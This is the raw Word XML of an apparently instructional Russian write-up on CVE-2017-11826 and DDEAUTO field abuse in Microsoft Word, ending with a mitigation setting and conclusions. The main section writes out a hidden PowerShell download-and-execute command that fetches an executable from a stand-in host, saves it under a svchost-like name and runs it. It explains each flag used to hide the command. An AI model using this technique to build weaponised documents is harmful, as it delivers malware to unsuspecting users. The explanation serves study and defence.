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D4" w:rsidRPr="00BF26D7" w:rsidRDefault="00FA30D4" w:rsidP="00FA30D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Описание уязвимости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CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-2017-11826</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B1D19" w:rsidRPr="00B97EE9" w:rsidRDefault="00FA30D4" w:rsidP="000A412D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ab/>
        <w:t xml:space="preserve">Уязвимость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CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">-2017-11826 позволяет внедрить в документ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97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> произвольный код, который будет вы</w:t>
      </w:r>
      <w:r w:rsidR="000A412D" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>полнен, при открытии документа.</w:t>
      </w:r>
      <w:r w:rsidR="003A5906" w:rsidRPr="00B9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BB6" w:rsidRPr="00B97EE9" w:rsidRDefault="001B1D19" w:rsidP="00E07F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>Выполнение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 вредоносного кода </w:t>
      </w:r>
      <w:r w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">возможно благодаря протоколу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, устаревшего, но все еще используемого </w:t>
      </w:r>
      <w:r w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">в большинстве продуктах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7EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, в 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в </w:t>
      </w:r>
      <w:r w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>том ч</w:t>
      </w:r>
      <w:r w:rsidR="000D2951" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>исле (п</w:t>
      </w:r>
      <w:r w:rsidR="00EF5788" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">оэтому данный вектор атаки применим </w:t>
      </w:r>
      <w:r w:rsidR="006C0251" w:rsidRPr="00B97EE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EF5788" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ко всем продуктам </w:t>
      </w:r>
      <w:r w:rsidR="00EF5788"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2951" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00EF5788" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00E86223" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Данный протокол обеспечивает обмен сообщениями и данными между приложениями, его поддерживающими. Одним из таким приложений является </w:t>
      </w:r>
      <w:r w:rsidR="00E86223"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86223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E86223"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86223" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Механизм </w:t>
      </w:r>
      <w:r w:rsidR="00E86223"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="00E86223" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, в документах </w:t>
      </w:r>
      <w:r w:rsidR="00E86223"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86223" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, используется в полях</w:t>
      </w:r>
      <w:r w:rsidR="006C3604" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, которые имеют тип</w:t>
      </w:r>
      <w:r w:rsidR="00E86223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E86223" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DDEAUTO</w:t>
      </w:r>
      <w:r w:rsidR="00964D51" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.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 Другими словами, документ </w:t>
      </w:r>
      <w:r w:rsidR="006C3604"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 может общаться с другими </w:t>
      </w:r>
      <w:r w:rsidR="006C3604"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="006C3604" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> совместимыми приложениями</w:t>
      </w:r>
      <w:r w:rsidR="00B875CF" w:rsidRPr="00B875CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00851D00">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>по средст</w:t>
      </w:r>
      <w:r w:rsidR="00B875CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidR="00851D00">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidR="00B875CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>м полей</w:t>
      </w:r>
      <w:r w:rsidR="006C3604" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00964D51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3A5906" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Поля в </w:t>
      </w:r>
      <w:r w:rsidR="003A5906"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A5906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3A5906"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A5906" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> можно создать с помощью нажатия </w:t>
      </w:r>
      <w:r w:rsidR="003A5906" w:rsidRPr="00B97EE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A5906" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidR="003A5906" w:rsidRPr="00B97E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5906" w:rsidRPr="00B97EE9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E27BB6" w:rsidRPr="00B97EE9" w:rsidRDefault="00E27BB6" w:rsidP="00E07F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>Шаблон создания поля</w:t>
      </w:r>
      <w:r w:rsidR="001B1D19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1B1D19"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97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27BB6" w:rsidRPr="00B97EE9" w:rsidRDefault="00E27BB6" w:rsidP="00E27BB6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DDEAUTO</w:t>
      </w:r>
      <w:r w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B1D19" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>ВЫПОЛНЯЕМАЯ_ПРОГРАММА АРГУМЕНТЫ_ПРОГРАММЫ</w:t>
      </w:r>
      <w:r w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007115A2" w:rsidRPr="00B97EE9" w:rsidRDefault="00964D51" w:rsidP="00E07F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Постфикс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97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> означает, что поле будет интерпретировано при открытии документа.</w:t>
      </w:r>
      <w:r w:rsidR="00B43F25" w:rsidRPr="00B9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D51" w:rsidRPr="00B97EE9" w:rsidRDefault="00B43F25" w:rsidP="00E07F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Все вышесказанное означает, что создав поле типа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AUTO</w:t>
      </w:r>
      <w:r w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, мы можем запустить любую программу, с любыми аргументами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A412D" w:rsidRPr="00B97EE9" w:rsidRDefault="003D1F10" w:rsidP="00E07F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Попробуем </w:t>
      </w:r>
      <w:r w:rsidR="00E07FF7" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>использовать данную особенность, чтобы скачать вредоносный файл и запустить его, без ведома жертвы.</w:t>
      </w:r>
      <w:r w:rsidR="00F90CAC" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Для функций скачивания и запуска файла прекрасно подойдет </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F90CAC"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F90CAC" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Полностью, команда выглядит следующим образом:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F90CAC" w:rsidRPr="00E673C7" w:rsidRDefault="005470F4" w:rsidP="00E673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c:\\windows\\system32\\cmd.exe "/k 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powershell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NoP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Sta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NonI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WindowStyle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dden (New-Object System.Net.WebClient).DownloadFile('http://example.com/virus.exe',' %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tmp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%\svchosst.exe');Start-Process -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WindowStyle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dden '%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E673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%\svchosst.exe'" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005470F4" w:rsidRPr="00B97EE9" w:rsidRDefault="005470F4" w:rsidP="00E67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Как мы видим, используя метод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wnloadFile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WebClient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 xml:space="preserve">, мы скачиваем файл по адресу </w:t>
      </w:r>
      <w:r w:rsidRPr="003E15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15A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:r w:rsidRPr="003E15A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3E15A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003E15A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E15A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="003E15A6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Pr="003E15A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003E15A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97E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80FCA" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сохраняем во временную папку, и сразу же запускаем.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005470F4" w:rsidRPr="00B97EE9" w:rsidRDefault="005470F4" w:rsidP="00E67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Описание параметров, используемых в нашей команде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E673C7" w:rsidRPr="00191D57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005470F4" w:rsidRPr="00B97EE9" w:rsidRDefault="005470F4" w:rsidP="005470F4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NoP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (-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NoProfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Не использовать текущий профиль пользователя. Запрещает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'у использовать пользовательские скрипты, которые автоматически подгружаются при старте и могут влиять на работу нашего кода</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005470F4" w:rsidRPr="00B97EE9" w:rsidRDefault="005470F4" w:rsidP="005470F4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sta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 xml:space="preserve"> Запускает </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A80FCA"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A80FCA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Pr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в однопоточном режиме</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005470F4" w:rsidRPr="00B97EE9" w:rsidRDefault="005470F4" w:rsidP="005470F4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NonI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (-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NonInteractive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A80FCA" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00A80FCA" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Отключает</w:t>
      </w:r>
      <w:r w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> интерактивный режим</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A412D" w:rsidRPr="00B97EE9" w:rsidRDefault="005470F4" w:rsidP="005470F4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WindowStyle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B97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EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hidden</w:t>
      </w:r>
      <w:r w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Не показывать окно командной строки</w:t>
      </w:r>
      <w:r w:rsidR="000A412D" w:rsidRPr="00B97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B8" w:rsidRPr="00B97EE9" w:rsidRDefault="00AD6CB8" w:rsidP="00191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>Примечания: DownloadFile скачивает, используя метод GET</w:t>
      </w:r>
      <w:r w:rsidR="002358D8" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005470F4" w:rsidRDefault="00AD6CB8" w:rsidP="00AD6CB8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Команда Start-Process запускает скачанный exe-шник (если же файл </w:t>
      </w:r>
      <w:r w:rsidR="002358D8" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">будет иметь другое расширение, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>powershell будет пытаться открыть его стандартной, для такого расширения программой)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1797" w:rsidRPr="00BF26D7" w:rsidRDefault="00EA1797" w:rsidP="00AD6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автоматизации был написан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EA17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A1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A17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истинг приведен в конце), который создает вредонос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A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На вход скрипт получ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доносного файла. На выходе - </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA17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EA1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c DDEAUTO полем, внутри которого вышеописанная команда для скачивания и запуска файла. Справку по использованию скрипта можно получить передав параметр </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“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26D7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A1797" w:rsidRPr="00EA1797" w:rsidRDefault="00EA1797" w:rsidP="00AD6CB8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF26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генерировав вредоносны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и запустив, мы увидим следующее:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D16230" w:rsidRPr="00B97EE9" w:rsidRDefault="000A412D" w:rsidP="00D16230">
      <w:pPr>
        <w:keepNext/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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D16230" w:rsidRPr="00B97E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9933E" wp14:editId="7FA2B851">
            <wp:extent cx="5940425" cy="1362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-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0" w:rsidRPr="00B97EE9" w:rsidRDefault="00D16230" w:rsidP="00D16230">
      <w:pPr>
        <w:jc w:val="center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B97EE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Такое окно нас встречает при открытии документа.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D16230" w:rsidRDefault="006E6514" w:rsidP="00D16230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уть текста данного предупреждения проста. Технология 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DE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дразумевает взаимодействие приложений, как клиента и сервера, которые устанавливают соединение (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ink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между собой, для обмена данными. Клиентом в данном случае является наш документ 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Word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а сервером то, что прописано в поле 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DEAUTO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Существует два вида соединения. Первое, когда сервер обменивается данными с клиент</w:t>
      </w:r>
      <w:r w:rsidR="00462417"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м по готовности самих данных, второе, когда сервер уведомляет о готовности данных. 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явившееся </w:t>
      </w:r>
      <w:r w:rsidR="00462417"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но уведомляет нас о готовности данных на “сервере”, и готовы ли мы их получить. То есть, готовы ли мы начать выполнение команды, указанной в нашем поле.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1A1DBC" w:rsidRDefault="001A1DBC" w:rsidP="00D16230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 xml:space="preserve">Нажимаем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es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видим следующее окно:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A1DBC" w:rsidRPr="001A1DBC" w:rsidRDefault="001A1DBC" w:rsidP="00D16230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916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-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BC" w:rsidRDefault="001A1DBC" w:rsidP="001A1DB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ab/>
        <w:t xml:space="preserve">Текст гласит, что данные недоступны, это и верно, ведь никаких данных, мы и не собирались получать. И после того, как мы нажимаем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Yes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ще раз, наша </w:t>
      </w:r>
      <w:r w:rsidR="00A613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редоносная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манда выполняется, вредоносный файл скачивается и запускается. После, появляется еще одно окно.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A1DBC" w:rsidRDefault="001A1DBC" w:rsidP="001A1DBC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A1DBC" w:rsidRDefault="001A1DBC" w:rsidP="001A1DBC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58256" cy="110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BC" w:rsidRDefault="001A1DBC" w:rsidP="001A1DBC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p w:rsidR="001A1DBC" w:rsidRPr="001A1DBC" w:rsidRDefault="001A1DBC" w:rsidP="00194623">
      <w:pPr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анное предупреждение логично, ведь мы используем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DE</w:t>
      </w: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о прямому назначению, а значит никаких данных от «сервера» мы не получили.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B76A4" w:rsidRDefault="00194623" w:rsidP="003D1F10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особы защиты</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00194623" w:rsidRDefault="00194623" w:rsidP="00194623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В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Word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2016, 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обходимо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крыть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File - Options</w:t>
      </w:r>
      <w:r w:rsidRPr="00194623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– Advanced,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00194623" w:rsidRPr="00194623" w:rsidRDefault="00194623" w:rsidP="00194623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Pr="00003C5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нять</w:t>
      </w:r>
      <w:r w:rsidRPr="00003C5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алочку</w:t>
      </w:r>
      <w:r w:rsidRPr="00003C5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</w:t>
      </w:r>
      <w:r w:rsidRPr="00003C58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Update automatic links at open.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00194623" w:rsidRPr="00194623" w:rsidRDefault="00194623" w:rsidP="00194623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6507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on-to-disable-dde-att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10" w:rsidRPr="001A1DBC" w:rsidRDefault="003D1F10" w:rsidP="003D1F10">
      <w:pPr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A1DB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Выводы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A412D" w:rsidRPr="00B97EE9" w:rsidRDefault="000A412D" w:rsidP="000D7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Основная опасность атаки заключается в том, что </w:t>
      </w:r>
      <w:r w:rsidR="000D72EA" w:rsidRPr="00B97EE9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97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> никак не связан </w:t>
      </w:r>
      <w:r w:rsidR="000D72EA" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с макросами</w:t>
      </w:r>
      <w:r w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. То есть, отключив макросы, вы все равно </w:t>
      </w:r>
      <w:r w:rsidR="000D72EA" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>остаетесь уязвимы. С</w:t>
      </w:r>
      <w:r w:rsidRPr="00B97EE9">
        <w:rPr>
